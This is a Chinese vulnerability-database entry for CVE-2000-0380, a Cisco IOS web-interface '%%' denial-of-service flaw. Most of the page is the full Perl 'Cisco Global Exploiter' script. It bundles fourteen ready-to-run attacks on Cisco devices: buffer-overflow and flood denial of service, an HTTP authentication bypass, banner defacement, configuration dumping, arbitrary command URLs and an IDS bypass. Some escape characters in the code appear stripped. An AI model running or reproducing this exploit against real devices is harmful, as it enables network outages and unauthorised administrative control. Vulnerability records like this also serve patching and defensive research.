Cisco IOS Web管理接口”%%”字串远程拒绝服务攻击漏洞
| 漏洞ID | 1105805 | 漏洞类型 | 输入验证 |
| 发布时间 | 2000-04-26 | 更新时间 | 2005-07-27 |
![图片[1]-Cisco IOS Web管理接口”%%”字串远程拒绝服务攻击漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2000-0380 |
![图片[2]-Cisco IOS Web管理接口”%%”字串远程拒绝服务攻击漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200004-074 |
| 漏洞平台 | Hardware | CVSS评分 | 7.1 |
|漏洞来源
|漏洞详情
CiscoIOS是广泛运行于Cisco系统各种网络设备中的操作系统。多种Cisco路由器运行的IOS的HTTP管理接口实现上存在漏洞,远程攻击者可能利用此漏洞对设备进行拒绝服务攻击。如果这些路由器启动了一个WEB服务器,用来对路由器进行管理或者其他操作的话,(通常是通过添加”iphttpserver”类似的命令来启动web服务的)攻击者只要提交一个URL:http://victim.router/%%,就能导致路由器崩溃。有些路由器会自动重起,有的则必须手工关闭电源并启动才能使路由器恢复正常工作。
|漏洞EXP
#source: http://www.securityfocus.com/bid/1154/info
#
#A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user can cause the router to crash.
#
#!/usr/bin/perl
##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##
##
# Modules
##
use Socket;
use IO::Socket;
##
# Main
##
$host = "";
$expvuln = "";
$host = @ARGV[ 0 ];
$expvuln = @ARGV[ 1 ];
if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
elsif ($expvuln eq "11") {
cisco11();
}
elsif ($expvuln eq "12") {
cisco12();
}
elsif ($expvuln eq "13") {
cisco13();
}
elsif ($expvuln eq "14") {
cisco14();
}
else {
printf "nInvalid vulnerability number ...nn";
exit(1);
}
##
# Functions
##
sub usage
{
printf "nUsage :n";
printf "perl cge.pl <target> <vulnerability number>nn";
printf "Vulnerabilities list :n";
printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerabilityn";
printf "[2] - Cisco IOS Router Denial of Service Vulnerabilityn";
printf "[3] - Cisco IOS HTTP Auth Vulnerabilityn";
printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerabilityn";
printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerabilityn";
printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerabilityn";
printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerabilityn";
printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerabilityn";
printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerabilityn";
printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerabilityn";
printf "[11] - Cisco Catalyst Memory Leak Vulnerabilityn";
printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerabilityn";
printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)n";
printf "[14] - Cisco IOS HTTP Denial of Service Vulnerabilityn";
exit(1);
}
sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
my $serv = $host;
my $dch = "?????????????????a~ %%%%%XX%%%%%";
my $num = 30000;
my $string .= $dch x $num;
my $shc="�15�12";
my $sockd = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "(23)",
) || die("No telnet server detected on $serv ...nn");
$sockd->autoflush(1);
print $sockd "$string". $shc;
while (<$sockd>){ print }
print("nPacket sent ...n");
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "(23)",
) || die("Vulnerability successful exploited. Target server is down ...nn");
print("Vulnerability unsuccessful exploited. Target server is still up ...nn");
close($sockd2);
exit(1);
}
sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
my $serv = $host;
my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...nn"};
$sockd->autoflush(1);
print $sockd "GET /%% HTTP/1.0nn";
-close $sockd;
print "Packet sent ...n";
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...nn"};
print("Vulnerability unsuccessful exploited. Target server is still up ...nn");
close($sockd2);
exit(1);
}
sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
my $serv= $host;
my $n=16;
my $port=80;
my $target = inet_aton($serv);
my $fg = 0;
LAB: while ($n<100) {
my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0rnrn");
$n++;
foreach $line (@results){
$line=~ tr/A-Z/a-z/;
if ($line =~ /http/1.0 401 unauthorized/) {$fg=1;}
if ($line =~ /http/1.0 200 ok/) {$fg=0;}
}
if ($fg==1) {
sleep(2);
print "Vulnerability unsuccessful exploited ...nn";
}
else {
sleep(2);
print "nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...nn";
last LAB;
}
sub exploit {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Unable to initialize socket ...nn");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S);
$|=1;
print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
}
else { die("No http server detected on $serv ...nn"); }
}
}
exit(1);
}
sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
my $serv = $host;
my $n = 16;
while ($n <100) {
exploit1("GET /level/$n/exec/- HTTP/1.0nn");
$wr =~ s/n//g;
if ($wr =~ /200 ok/) {
while(1)
{ print "nVulnerability could be successful exploited. Please choose a type of attack :n";
print "[1] Banner changen";
print "[2] List vty 0 4 acl infon";
print "[3] Othern";
print "Enter a valid option [ 1 - 2 - 3 ] : ";
$vuln = <STDIN>;
chomp($vuln);
if ($vuln == 1) {
print "nEnter deface line : ";
$vuln = <STDIN>;
chomp($vuln);
exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0nn");
}
elsif ($vuln == 2) {
exploit1("GET /level/$n/exec/show%20conf HTTP/1.0nn");
print "$wrf";
}
elsif ($vuln == 3)
{ print "nEnter attack URL : ";
$vuln = <STDIN>;
chomp($vuln);
exploit1("GET /$vuln HTTP/1.0nn");
print "$wrf";
}
}
}
$wr = "";
$n++;
}
die "Vulnerability unsuccessful exploited ...nn";
sub exploit1 {
my $sockd = IO::Socket::INET -> new (
Proto => 'tcp',
PeerAddr => $serv,
PeerPort => 80,
Type => SOCK_STREAM,
Timeout => 5);
unless($sockd){die "No http server detected on $serv ...nn"}
$sockd->autoflush(1);
$sockd -> send($_[0]);
while(<$sockd>){$wr .= $_} $wrf = $wr;
close $sockd;
}
exit(1);
}
sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
my $serv = $host;
my $port = 22;
my $vuln = "a%a%a%a%a%a%a%";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No ssh server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
close($sockd);
exit(1);
}
sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET ? HTTP/1.0nn";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
sleep(2);
print "nServer response :nn";
close($sockd);
exit(1);
}
sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
my $serv = $host;
my $port = 80;
my $k = "";
print "Enter a file to read [ /show/config/cr set as default ] : ";
$k = <STDIN>;
chomp ($k);
if ($k eq "")
{$vuln = "GET /exec/show/config/cr HTTP/1.0nn";}
else
{$vuln = "GET /exec$k HTTP/1.0nn";}
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
sleep(2);
print "nServer response :nn";
while (<$sockd>){print}
close($sockd);
exit(1);
}
sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET /error?/ HTTP/1.0nn";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
sleep(2);
print "nServer response :nn";
while (<$sockd>){print}
close($sockd);
exit(1);
}
sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
my $ip = $host;
my $port = "514";
my $ports = "";
my $size = "";
my $i = "";
my $string = "%%%%%XX%%%%%";
print "Input packets size : ";
$size = <STDIN>;
chomp($size);
socket(SS, PF_INET, SOCK_DGRAM, 17);
my $iaddr = inet_aton("$ip");
for ($i=0; $i<10000; $i++)
{ send(SS, $string, $size, sockaddr_in($port, $iaddr)); }
printf "nPackets sent ...n";
sleep(2);
printf "Please enter a server's open port : ";
$ports = <STDIN>;
chomp $ports;
printf "nNow checking server status ...n";
sleep(2);
socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...nn";
my $dest = sockaddr_in ($ports, inet_aton($ip));
connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...nn";
printf "Vulnerability unsuccessful exploited. Target server is still up ...nn";
exit(1);
}
sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
my $ip = $host;
my $vln = "%%%%%XX%%%%%";
my $num = 30000;
my $string .= $vln x $num;
my $shc="�15�12";
my $sockd = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $ip,
PeerPort => "(2002)",
) || die "Unable to connect to $ip:2002 ...nn";
$sockd->autoflush(1);
print $sockd "$string" . $shc;
while (<$sockd>){ print }
print "Packet sent ...n";
close($sockd);
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>"(2002)",);
unless ($sockd){die "Vulnerability successful exploited. Target server is down ...nn"};
print("Vulnerability unsuccessful exploited. Target server is still up ...nn");
exit(1);
}
sub cisco11 # Cisco Catalyst Memory Leak Vulnerability
{
my $serv = $host;
my $rep = "";
my $str = "AAAn";
print "nInput the number of repetitions : ";
$rep = <STDIN>;
chomp $rep;
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => "(23)",
Proto => "tcp")
|| die "No telnet server detected on $serv ...nn";
for ($k=0; $k<=$rep; $k++) {
print $sockd "$str";
sleep(1);
print $sockd "$str";
sleep(1);
}
close($sockd);
print "Packet sent ...n";
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"(23)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...nn"};
print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\n";
close($sockd2);
exit(1);
}
sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
{
my $serv = $host;
my $l =100;
my $vuln = "";
my $long = "A" x $l;
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => "(80)",
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
for ($k=0; $k<=50; $k++) {
my $vuln = "GET " . $long . " HTTP/1.0nn";
print $sockd "$vulnnn";
sleep(1);
$l = $l + 100;
}
close($sockd);
print "Packet sent ...n";
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...nn"};
print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)n";
close($sockd2);
exit(1);
}
sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)
{
my $serv = $host;
my $vuln = "GET %u002F HTTP/1.0nn";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => "(80)",
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
close($sockd);
sleep(1);
print("Now checking server's status ...n");
print("Please verify if directory has been listed ...nn");
print("Server response :n");
sleep(2);
while (<$sockd>){ print }
exit(1);
}
sub cisco14 # Cisco IOS HTTP server DoS Vulnerability
{
my $serv = $host;
my $vuln = "GET /TEST?/ HTTP/1.0";
my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...nn"};
print $sockd "$vulnnn";
print "Packet sent ...n";
close($sockd);
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...nn"};
print("Vulnerability unsuccessful exploited. Target server is still up ...nn");
close($sockd2);
exit(1);
}
|参考资料
来源:BID
名称:1154
链接:http://www.securityfocus.com/bid/1154
来源:OSVDB
名称:1302
链接:http://www.osvdb.org/1302
来源:CISCO
名称:20000514CiscoIOSHTTPServerVulnerability
链接:http://www.cisco.com/warp/public/707/ioshttpserver-pub.shtml
来源:BUGTRAQ
名称:20000426CiscoHTTPpossiblebug:
链接:http://archives.neohapsis.com/archives/bugtraq/2000-04/0261.html
来源:NSFOCUS
名称:483
链接:http://www.nsfocus.net/vulndb/483
相关推荐: Divine Content Server 5.0 – Error Page Cross-Site Scripting
Divine Content Server 5.0 – Error Page Cross-Site Scripting 漏洞ID 1054209 漏洞类型 发布时间 2003-10-03 更新时间 2003-10-03 CVE编号 N/A CNNVD-ID N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666